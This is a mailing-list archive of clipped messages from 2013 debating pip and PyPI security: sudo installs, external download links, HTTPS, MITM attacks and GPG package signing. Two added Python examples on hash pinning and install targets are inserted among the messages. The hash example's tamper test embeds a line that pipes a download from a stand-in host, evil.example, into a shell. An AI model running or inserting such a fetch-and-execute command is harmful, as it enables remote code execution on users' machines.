On Tue, Feb 5, 2013 at 8:42 AM, M.-A. Lemburg m...@egenix.com wrote:
On 05.02.2013 02:36, Nick Coghlan wrote:
Something that caught my attention in the recent security discussions
is the observation that one of the most common insecure practices in
the Python community is to run sudo pip with
On 05.02.2013 09:02, Lennart Regebro wrote:
On Tue, Feb 5, 2013 at 8:42 AM, M.-A. Lemburg m...@egenix.com wrote:
On 05.02.2013 02:36, Nick Coghlan wrote:
Something that caught my attention in the recent security discussions
is the observation that one of the most common insecure practices in
On Tue, Feb 5, 2013 at 9:11 AM, M.-A. Lemburg m...@egenix.com wrote:
The solution Nick proposed also has another issue: it would
install packages meant for a virtualenv in the user's site
packages dir (outside the virtualenv)... If pip used the user
site packages by default (when running as
On Tue, Feb 5, 2013 at 10:19 AM, Lennart Regebro rege...@gmail.com wrote:
On Tue, Feb 5, 2013 at 9:11 AM, M.-A. Lemburg m...@egenix.com wrote:
Looks like a slippery road if you try to make pip guess
what the right installation dir should be, e.g. by trying
to detect that it's running in a
On 05/feb/2013, at 02:36, Nick Coghlan ncogh...@gmail.com wrote:
Something that caught my attention in the recent security discussions
is the observation that one of the most common insecure practices in
the Python community is to run sudo pip with unsigned packages
On Tue, Feb 5, 2013 at 10:57 AM, Giovanni Bajo ra...@develer.com wrote:
One meta-question: does this mailing-list have any authority over pip?
Nope. And none over Distribute/Setuptools either.
Are there any pip maintainers here?
Yes, at least one. But the more the merrier as they may have
On Tue, Feb 5, 2013 at 10:16 AM, Lennart Regebro rege...@gmail.com wrote:
We do also have at least one Distribute maintainer on the list. For
Setuptools it would be best if Distribute and Setuptools could be
merged.
+1 on this. On #python we daily get people asking about bugs in setuptools,
On Tue, Feb 5, 2013 at 7:57 PM, Giovanni Bajo ra...@develer.com wrote:
One meta-question: does this mailing-list have any authority over pip? Are
there any pip maintainers here? Because I see that pip development being done
on different channels, so I was wondering what is the workflow to
On Tuesday, February 5, 2013 at 5:16 AM, Lennart Regebro wrote:
1. Packages should only be installed from the given package indexes.
No scraping of websites as at least easy_install/buildout does, no
downloading from external download links. A deprecation period for
this of a couple of months,
On Feb 5, 2013, at 7:51 AM, Donald Stufft donald.stu...@gmail.com wrote:
On Tuesday, February 5, 2013 at 5:16 AM, Lennart Regebro wrote:
1. Packages should only be installed from the given package indexes.
No scraping of websites as at least easy_install/buildout does, no
downloading from
On Tue, Feb 5, 2013 at 1:51 PM, Donald Stufft donald.stu...@gmail.com wrote:
On Tuesday, February 5, 2013 at 5:16 AM, Lennart Regebro wrote:
1. Packages should only be installed from the given package indexes.
No scraping of websites as at least easy_install/buildout does, no
downloading
On Feb 5, 2013, at 8:02 AM, Holger Krekel holger.kre...@gmail.com wrote:
On Tue, Feb 5, 2013 at 1:51 PM, Donald Stufft donald.stu...@gmail.com wrote:
On Tuesday, February 5, 2013 at 5:16 AM, Lennart Regebro wrote:
1. Packages should only be installed from the given package indexes.
No
On Tue, Feb 5, 2013 at 1:51 PM, Donald Stufft donald.stu...@gmail.com wrote:
PyPI will need to change for this to happen realistically if I recall. There
is a hard limit on how large of a distribution can be uploaded to PyPI
and there are, if I recall, valid distributions which are larger than
On Tue, Feb 5, 2013 at 2:05 PM, Jesse Noller jnol...@gmail.com wrote:
On Feb 5, 2013, at 8:02 AM, Holger Krekel holger.kre...@gmail.com wrote:
On Tue, Feb 5, 2013 at 1:51 PM, Donald Stufft donald.stu...@gmail.com wrote:
On Tuesday, February 5, 2013 at 5:16 AM, Lennart Regebro wrote:
1.
On Tuesday, February 5, 2013 at 8:06 AM, Lennart Regebro wrote:
Anyone know which ones? scipy is the largest I know of, at 6-7 MB.
Someone told me once (Richard maybe?) I think the one mentioned was
one of the GUI toolkits? If there is one I'm sure there are others so if that
is a direction
On Tue, Feb 5, 2013 at 2:02 PM, Holger Krekel holger.kre...@gmail.com wrote:
Dropping the crawling over external pages needs _much_ more than just a few
months deprecation warnings, rather years. There are many packages out
there, and it would break people's installations.
No it won't.
On Tuesday, February 5, 2013 at 8:13 AM, Lennart Regebro wrote:
On Tue, Feb 5, 2013 at 2:02 PM, Holger Krekel holger.kre...@gmail.com wrote:
Dropping the crawling over external pages needs _much_ more than just a few
months deprecation warnings, rather
On Tue, Feb 5, 2013 at 2:18 PM, Donald Stufft donald.stu...@gmail.com wrote:
A longer deprecation wouldn't be a bad thing merely because a lot
of people depend on this feature without even realizing it. Crate has
an index you can use that removes all external urls to test your own
projects
On Tuesday, February 5, 2013 at 8:34 AM, Lennart Regebro wrote:
On Tue, Feb 5, 2013 at 2:18 PM, Donald Stufft donald.stu...@gmail.com wrote:
A longer deprecation wouldn't be a bad thing merely because a lot
of people depend on this feature without even
At Tue, 5 Feb 2013 11:36:46 +1000,
Nick Coghlan wrote:
Something that caught my attention in the recent security discussions
is the observation that one of the most common insecure practices in
the Python community is to run sudo pip with unsigned packages
(sometimes on untrusted networks).
On 05.02.2013 14:06, Lennart Regebro wrote:
On Tue, Feb 5, 2013 at 1:51 PM, Donald Stufft donald.stu...@gmail.com wrote:
PyPI will need to change for this to happen realistically if I recall. There
is a hard limit on how large of a distribution can be uploaded to PyPI
and there are, if I
On 05.02.2013 14:18, Donald Stufft wrote:
On Tuesday, February 5, 2013 at 8:13 AM, Lennart Regebro wrote:
That will mean that a man in the middle-attack might poison PyPI's
cache. I don't think that's a feasible path forward.
Packages do not need to be cached, as they are not supposed to
On Tue, Feb 5, 2013 at 2:13 PM, Lennart Regebro rege...@gmail.com wrote:
On Tue, Feb 5, 2013 at 2:02 PM, Holger Krekel holger.kre...@gmail.com
wrote:
Dropping the crawling over external pages needs _much_ more than just a
few
months deprecation warnings, rather years. There are many
On Tue, Feb 5, 2013 at 11:55 PM, Jeroen Dekkers jer...@dekkers.ch wrote:
At Tue, 5 Feb 2013 11:36:46 +1000,
Nick Coghlan wrote:
Something that caught my attention in the recent security discussions
is the observation that one of the most common insecure practices in
the Python community is to
On Tue, Feb 5, 2013 at 9:28 AM, Donald Stufft donald.stu...@gmail.com wrote:
On Tuesday, February 5, 2013 at 9:24 AM, Daniel Holth wrote:
As long as you are trusting PyPI itself, a PyPI-hosted/signed/timestamped
SHA2 hash of the file to be downloaded from an external host would be
enough to
On 05/feb/2013, at 15:34, Daniel Holth dho...@gmail.com wrote:
On Tue, Feb 5, 2013 at 9:28 AM, Donald Stufft donald.stu...@gmail.com wrote:
On Tuesday, February 5, 2013 at 9:24 AM, Daniel Holth wrote:
As long as you are trusting PyPI itself, a PyPI-hosted/signed/timestamped
On 05/feb/2013, at 15:06, Holger Krekel holger.kre...@gmail.com wrote:
In the end, however, none of this prevents MITM attacks between a downloader
and pypi.python.org. Or between the uploader and pypi.python.org (using
basic auth over http often). Signing methods like
On Tue, Feb 5, 2013 at 5:16 AM, Lennart Regebro rege...@gmail.com wrote:
...
1. Packages should only be installed from the given package indexes.
No scraping of websites as at least easy_install/buildout does, no
downloading from external download links. A deprecation period for
this of a
On Tue, Feb 5, 2013 at 2:42 PM, Donald Stufft donald.stu...@gmail.com wrote:
If you break peoples ability to install packages right away they'll refuse
to upgrade.
Good point. We want the problems to be fixed, not avoided.
One thing just struck me: We have the maintainer emails of most
On Wed, Feb 6, 2013 at 12:46 AM, Giovanni Bajo ra...@develer.com wrote:
On 05/feb/2013, at 15:06, Holger Krekel holger.kre...@gmail.com wrote:
In the end, however, none of this prevents MITM attacks between a downloader
and pypi.python.org. Or between the uploader and
On Tue, Feb 05, 2013 at 15:46 +0100, Giovanni Bajo wrote:
On 05/feb/2013, at 15:06, Holger Krekel holger.kre...@gmail.com wrote:
In the end, however, none of this prevents MITM attacks between a
downloader and pypi.python.org. Or between the uploader and
On Wed, Feb 6, 2013 at 12:54 AM, Jim Fulton j...@zope.com wrote:
pip will need to learn to prefer non-final releases.
I was pressed to put buildout alpha and beta releases on a separate site
because of the concern that they'd be installed inadvertently by pip.
FWIW, PEP 426 aims to address
On Tuesday, February 5, 2013 at 9:54 AM, Jim Fulton wrote:
pip will need to learn to prefer non-final releases.
PEP426 states this as part of its requirements so I expect all package
tools to move that way, and, at the risk of promising time I don't have,
if someone else doesn't make pip do
On 05/feb/2013, at 15:57, Nick Coghlan ncogh...@gmail.com wrote:
On Wed, Feb 6, 2013 at 12:46 AM, Giovanni Bajo ra...@develer.com wrote:
On 05/feb/2013, at 15:06, Holger Krekel holger.kre...@gmail.com wrote:
In the end, however, none of this prevents
On Tuesday, February 5, 2013 at 9:53 AM, holger krekel wrote:
Point taken. I guess unless someone sits down and writes a PEP-ish path for
fortification, it's gonna be hard to assess viability and resilience
against the several attack vectors which should be sorted/prioritized.
Or is somebody
On Tue, Feb 5, 2013 at 3:06 PM, Holger Krekel holger.kre...@gmail.com wrote:
I wouldn't assume that maintainers are easily reachable. I've contacted at
least three people of different (1K downloads) packages which never
responded.
We really can't do very much about abandoned packages.
And
On Tuesday, February 5, 2013 at 10:06 AM, Giovanni Bajo wrote:
I do agree; in fact, I'm not the one suggesting to eg. pinning CA
certificates.
What I'm saying is that it's far more important to fix HTTPS in PyPI than to
verify GPG signatures. So when I hear the argument if we just verify
On Wed, Feb 6, 2013 at 1:06 AM, Donald Stufft donald.stu...@gmail.com wrote:
On Tuesday, February 5, 2013 at 9:53 AM, holger krekel wrote:
Point taken. I guess unless someone sits down and writes a PEP-ish path for
fortification, it's gonna be hard to assess viability and resilience
against
On Tue, Feb 5, 2013 at 3:24 PM, Daniel Holth dho...@gmail.com wrote:
As long as you are trusting PyPI itself, a PyPI-hosted/signed/timestamped
SHA2 hash of the file to be downloaded from an external host would be enough
to detect tampering over time.
Hm. The discussion about signatures of
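The tamper-detection idea quoted above (a hash published by the index for a file that is actually fetched from an external host), worked through as an added example that is not code from this thread, from pip or from PyPI. It assumes the pin is written in the `sha256:<hex>` form that pip's later hash-checking mode uses on `--hash=` requirement options; the parser, the `fetch` callback and the sample archive bytes are this example's own constructions.

```python
import hashlib
import hmac
import string

# Assumption for this example: only the SHA-2 family is accepted as a pin;
# md5/sha1 specs are rejected rather than silently trusted.
STRONG_HASHES = ("sha256", "sha384", "sha512")


def parse_pinned_hash(spec):
    """Split "sha256:<hex>" into (algorithm, lowercase hex digest).

    Rejects unknown algorithms, missing separators and digests whose
    length does not match the algorithm, so a truncated pin cannot
    accidentally "match" a truncated digest.
    """
    algo, sep, digest = spec.partition(":")
    if not sep or algo not in STRONG_HASHES:
        raise ValueError("unsupported or malformed hash spec: %r" % spec)
    expected_len = hashlib.new(algo).digest_size * 2
    if len(digest) != expected_len or any(c not in string.hexdigits for c in digest):
        raise ValueError("bad %s digest in %r" % (algo, spec))
    return algo, digest.lower()


def parse_requirement_line(line):
    """Parse "name==ver --hash=algo:hex [--hash=...]" into (name, [(algo, hex), ...]).

    More than one pin is allowed so that, e.g., an sdist and a wheel of the
    same release can both be accepted.
    """
    parts = line.split()
    if not parts:
        raise ValueError("empty requirement line")
    name, pins = parts[0], []
    for opt in parts[1:]:
        if not opt.startswith("--hash="):
            raise ValueError("unexpected option: %r" % opt)
        pins.append(parse_pinned_hash(opt[len("--hash="):]))
    if not pins:
        raise ValueError("%s has no pinned hash; refusing unpinned install" % name)
    return name, pins


def verify_download(data, pins):
    """True iff data matches at least one (algo, digest) pin."""
    for algo, expected in pins:
        actual = hashlib.new(algo, data).hexdigest()
        # Constant-time comparison: digests are not secrets here, but the
        # habit costs nothing and avoids a timing side channel elsewhere.
        if hmac.compare_digest(actual, expected):
            return True
    return False


def fetch_and_verify(fetch, requirement_line):
    """Fetch the archive via the caller's fetch(name) and refuse a mismatch.

    The fetch callback stands in for the HTTP download from the external
    host; the pin is the only thing that ties that download back to what
    the index vouched for.
    """
    name, pins = parse_requirement_line(requirement_line)
    data = fetch(name)
    if not verify_download(data, pins):
        raise RuntimeError("%s: hash mismatch, refusing to install" % name)
    return data


# Constructed sample bytes standing in for the real external tarball.
GENUINE_ARCHIVE = b"fake-sdist: prettytable-0.6 (constructed sample, not the real file)"
TAMPERED_ARCHIVE = GENUINE_ARCHIVE + b"\n# os.system('curl http://evil.example/x | sh')"
PINNED_LINE = "prettytable==0.6 --hash=sha256:" + hashlib.sha256(GENUINE_ARCHIVE).hexdigest()


if __name__ == "__main__":
    print(fetch_and_verify(lambda name: GENUINE_ARCHIVE, PINNED_LINE) == GENUINE_ARCHIVE)
    try:
        fetch_and_verify(lambda name: TAMPERED_ARCHIVE, PINNED_LINE)
    except RuntimeError as exc:
        print("blocked:", exc)
```

The check is only as good as the channel that delivered the pin: a digest fetched over plain HTTP from the same network path as the archive can be swapped by the same attacker, which is the MITM point raised elsewhere in this thread, so the pin has to come from somewhere the attacker cannot rewrite (a requirements file under version control, or the index over verified HTTPS).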
On Tue, Feb 05, 2013 at 16:07 +0100, Lennart Regebro wrote:
On Tue, Feb 5, 2013 at 3:06 PM, Holger Krekel holger.kre...@gmail.com wrote:
I wouldn't assume that maintainers are easily reachable. I've contacted at
least three people of different (1K downloads) packages which never
responded.
On Tuesday, February 5, 2013 at 10:14 AM, holger krekel wrote:
Transporting almost all externally reachable packages to be locally pypi
served is also kind of a low hanging fruit, although probably slightly
higher hanging than SSL :) The point is that we can have some control over
those
On Tue, Feb 5, 2013 at 4:14 PM, holger krekel hol...@merlinux.eu wrote:
Sure, and that's another problem, and the low-hanging fruit there is
using https.
Transporting almost all externally reachable packages to be locally pypi
served is also kind of a low hanging fruit, although probably
On Tue, Feb 05, 2013 at 10:18 -0500, Donald Stufft wrote:
On Tuesday, February 5, 2013 at 10:14 AM, holger krekel wrote:
Transporting almost all externally reachable packages to be locally pypi
served is also kind of a low hanging fruit, although probably slightly
higher hanging than SSL :)
On Tuesday, February 5, 2013 at 10:41 AM, holger krekel wrote:
MITM attacking any of the many world-wide pypi/easy_install downloads
from external sites is much easier than tampering a few one-time
downloads (verified against each other) for pypi.python.org
pypi.python.org's
On Tue, Feb 5, 2013 at 5:03 PM, Donald Stufft donald.stu...@gmail.com wrote:
Besides the issues with validating that the package we are mirroring
is the authentic one there's also a legal issue. We don't know for sure
that we have the legal rights to redistribute those files. When you upload
a
Hello,
M.-A. Lemburg mal at egenix.com writes:
If pip used the user site packages by default (when running as anyone
other than root), that dangerous UI flow wouldn't happen. Even when
pip was run outside a virtualenv, it would just work from the users
perspective. It also has the
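The install-target policy proposed in the message above (user site-packages by default for anyone other than root, the virtualenv's own site-packages inside a virtualenv), written out as an added example that is not pip's code or anything posted in this thread. The policy function is hypothetical and reflects the proposal, not pip's real behaviour; the virtualenv and root detection uses only standard-library facts (`sys.base_prefix`/`sys.real_prefix`, `os.geteuid`, `site.ENABLE_USER_SITE`).

```python
import os
import site
import sys
import sysconfig


def in_virtualenv():
    """True when the running interpreter belongs to a venv or virtualenv.

    PEP 405 venvs report sys.prefix != sys.base_prefix; the older
    virtualenv tool marks itself with sys.real_prefix instead.
    """
    return hasattr(sys, "real_prefix") or sys.prefix != getattr(sys, "base_prefix", sys.prefix)


def is_root():
    """True for an effective uid of 0; non-POSIX platforms count as non-root."""
    geteuid = getattr(os, "geteuid", None)
    return geteuid is not None and geteuid() == 0


def choose_install_scheme(in_venv, root, user_site_enabled):
    """Pick the least-privileged install target that still makes sense.

    Hypothetical policy mirroring the proposal: "venv" inside a
    virtualenv, "user" for an unprivileged user whose user site-packages
    is enabled, and "system" only for root (or when user site is off,
    e.g. python -s or the suid/sgid lockout that sets ENABLE_USER_SITE to None).
    """
    if in_venv:
        return "venv"
    if not root and user_site_enabled:
        return "user"
    return "system"


def target_directory(scheme):
    """Resolve a scheme name to the site-packages directory it refers to."""
    if scheme == "user":
        return site.getusersitepackages()
    if scheme in ("venv", "system"):
        # Inside a venv sysconfig already points at the venv's purelib.
        return sysconfig.get_paths()["purelib"]
    raise ValueError("unknown scheme: %r" % scheme)


def decide():
    """Apply the policy to the current interpreter and return (scheme, path)."""
    scheme = choose_install_scheme(in_virtualenv(), is_root(), bool(site.ENABLE_USER_SITE))
    return scheme, target_directory(scheme)


if __name__ == "__main__":
    scheme, path = decide()
    print("%s -> %s" % (scheme, path))
```

Run it once as an ordinary user, once under `sudo`, and once inside an activated virtualenv to see the three outcomes; the point of keeping the decision in one small function is that the "slippery" guessing objected to elsewhere in the thread becomes a single, testable rule rather than scattered heuristics.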
On Tue, Feb 5, 2013 at 2:21 PM, Christian Heimes christ...@python.org wrote:
Hello,
I like to discuss my proposal for a package signing and verification
process. It's just a brief draft and not a final document. (Credits to
my friend Marcus Brinkmann for additional insights).
Package
On 05.02.2013 20:21, Christian Heimes wrote:
User installs package -
process: - tool retrieves the package and the combined signature
file (PyPI's signature, metadata file and embedded signature of the
uploader) - tool
On Tuesday, February 5, 2013 at 2:34 PM, Daniel Holth wrote:
There is a well-engineered framework out there already:
https://www.updateframework.com/wiki/SecuringPythonPackageManagement
To my knowledge this depends on PyPI remaining
On Tuesday, February 5, 2013 at 2:21 PM, Christian Heimes wrote:
Hello,
I like to discuss my proposal for a package signing and verification
process. It's just a brief draft and not a final document. (Credits to
my friend Marcus Brinkmann for additional insights).
Package maintainer
On 2/5/2013 11:35 AM, Lennart Regebro wrote:
On Tue, Feb 5, 2013 at 5:03 PM, Donald Stufft donald.stu...@gmail.com wrote:
Besides the issues with validating that the package we are mirroring
is the authentic one there's also a legal issue. We don't know for sure
that we have the legal rights to
On 2/5/2013 8:02 AM, Jesse Noller wrote:
On Feb 5, 2013, at 7:51 AM, Donald Stufft donald.stu...@gmail.com wrote:
On Tuesday, February 5, 2013 at 5:16 AM, Lennart Regebro wrote:
1. Packages should only be installed from the given package indexes.
No scraping
On Tuesday, February 5, 2013 at 4:02 PM, Terry Reedy wrote:
On 2/5/2013 8:02 AM, Jesse Noller wrote:
On Feb 5, 2013, at 7:51 AM, Donald Stufft donald.stu...@gmail.com wrote:
On Tuesday, February 5, 2013 at 5:16
On Tuesday, February 5, 2013 at 4:04 PM, Donald Stufft wrote:
On Tuesday, February 5, 2013 at 4:02 PM, Terry Reedy wrote:
Why is downloading from
code.google.com, for instance, worse than from
pypi.python.org?
On Tuesday, February 5, 2013 at 4:02 PM, Terry Reedy wrote:
Why is downloading from
code.google.com, for instance, worse than from
pypi.python.org?
http://prettytable.googlecode.com/files/prettytable-0.6.tar.gz
^ What secures that (totally
On 05/feb/2013, at 20:21, Christian Heimes christ...@python.org wrote:
Hello,
I like to discuss my proposal for a package signing and verification
process. It's just a brief draft and not a final document. (Credits to
my friend Marcus Brinkmann for additional insights).
On 05.02.2013 21:23, Donald Stufft wrote:
* Do we have bindings to GPG that we can use?
* If not are we going to depend on users to install GPG?
* GPG installation can be tricky, especially for someone new to
programming.
Linux and BSD come with GPG installed or easily
On 05.02.2013 21:23, Donald Stufft wrote:
* Do we have bindings to GPG that we can use?
There are some gpg bindings but my visibility is limited to Linux
world. GPG wrappers that talk to it using standardized input/output
format exist if you
On Tue, Feb 5, 2013 at 9:54 PM, Terry Reedy tjre...@udel.edu wrote:
The last I read (and I cannot find the seemingly hidden page) the author (or
rights-holder) of code must grant PSF something more than just
redistribution rights before uploading it. The same must also certify some
mumbo-jumbo
On Tue, Feb 5, 2013 at 10:13 PM, Giovanni Bajo ra...@develer.com wrote:
- An uploader must be able to revoke her keys from PyPI without
access to her private key.
This is already implemented, a user can modify her listed GPG fingerprint.
This is not different from, eg:, the page that
readthedocs.org is awesome, and seems to be gaining wider adoption. While
it is an independent project, I wonder if it serves the Python community well
to also have packages.python.org for documentation.
What about combining efforts, possibly with p.p.o as a mirror for rtd?
Cheers,
-Barry
On Tue, Feb 05, 2013 at 15:54 -0500, Terry Reedy wrote:
On 2/5/2013 11:35 AM, Lennart Regebro wrote:
On Tue, Feb 5, 2013 at 5:03 PM, Donald Stufft donald.stu...@gmail.com
wrote:
Besides the issues with validating that the package we are mirroring
is the authentic one there's also a legal
On Wed, Feb 6, 2013 at 12:33 AM, Jesse Noller jnol...@gmail.com wrote:
Read the docs is partially funded by the PSF. I'd happily increase that grant
and support it even more. For most projects it has become the de facto
location for sphinx based documentation.
I'm +100 on supporting it more,
On Feb 5, 2013, at 6:47 PM, Lennart Regebro rege...@gmail.com wrote:
On Wed, Feb 6, 2013 at 12:33 AM, Jesse Noller jnol...@gmail.com wrote:
Read the docs is partially funded by the PSF. I'd happily increase that
grant and support it even more. For most projects it has become the de facto
On Tuesday, February 5, 2013 at 6:49 PM, Jesse Noller wrote:
On Feb 5, 2013, at 6:47 PM, Lennart Regebro rege...@gmail.com wrote:
On Wed, Feb 6, 2013 at 12:33 AM, Jesse Noller jnol...@gmail.com wrote:
Read the docs is partially
On 6 February 2013 10:47, Lennart Regebro rege...@gmail.com wrote:
On Wed, Feb 6, 2013 at 12:33 AM, Jesse Noller jnol...@gmail.com wrote:
Read the docs is partially funded by the PSF. I'd happily increase that
grant and support it even more. For most projects it has become the de facto
On 6 February 2013 00:09, Donald Stufft donald.stu...@gmail.com wrote:
On Tuesday, February 5, 2013 at 8:06 AM, Lennart Regebro wrote:
Anyone know which ones? scipy is the largest I know of, at 6-7 MB.
Someone told me once (Richard maybe?) I think the one mentioned was
one of the GUI